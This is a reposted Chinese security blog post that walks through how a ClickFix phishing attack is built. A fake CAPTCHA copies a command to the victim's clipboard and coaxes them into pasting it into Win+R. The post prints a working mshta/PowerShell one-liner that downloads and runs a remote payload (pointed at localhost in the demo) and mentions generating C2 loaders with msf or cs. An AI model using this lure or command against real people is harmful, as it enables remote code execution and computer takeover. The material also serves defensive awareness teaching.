文章总结: ClickFix钓鱼攻击是一种无文件无下载的社工攻击手法,通过伪造人机验证流程诱导受害者使用Win+R运行并粘贴恶意命令(如mshta加载PowerShell载荷),实现C2木马加载与入侵。攻击者常以钓鱼邮件为入口,利用自动化检测区分目标身份。防御建议:提高对异常验证流程的警惕,不执行来源不明的运行命令。 综合评分: 87 文章分类: 安全意识,实战经验,WEB安全,红队,社会工程学
ClickFix钓鱼攻击构造
原创
【白】 【白】
白安全组
2026年8月4日 15:28 美国
在小说阅读器读本章
去阅读
前言
ClickFix钓鱼攻击,是一种无文件,无下载的攻击手法,主要利用社工的思路进行,针对的目标往往是非技术人员,甚至有一些会自动检测电脑上是否存在编程工具等,来分辨是否是技术人员之后再进行钓鱼,下面我们来讲讲具体实施的思路。
正文
我们先来用一张图理解一下这个钓鱼攻击的思路
本质上就是让用户进行人机验证,人机验证会引导用户win+r打开运行,然后引导用户粘贴复制的内容,其实内容是一段C2的木马加载命令,之后受害者就会被该钓鱼攻击入侵电脑。
这里我们制作一个本地的演示一下。
当我们构造了一个钓鱼邮件,让用户点击进去访问,比如我们是一个工作上的日报需要处理,当用户点击之后,就会出现这样的人机验证
这个是非常常见的一个过程,但我们点击之后,会出现让我们win+r然后粘贴
了这里我们的剪切板其实已经自动复制了一个而已代码,如下:
mshta vbscript:CreateObject("Wscript.Shell").Run("powershell -w h iex(iwr 'http://localhost:8080/p?t=W6LBS3QW'-UseB).Content",0)(window.close)
这个是我本地的测试代码,并不是真实的C2木马攻击的,这种类型的代码可以通过msf或者cs生成
我们打开之后粘贴进去
回车之后,网页就会检测黑客的c2服务器中是否接收到这个请求,接收到就会通过人机验证,然后再跳转到可能有用的正确页面。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:白安全组 【白】 【白】《ClickFix钓鱼攻击构造》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论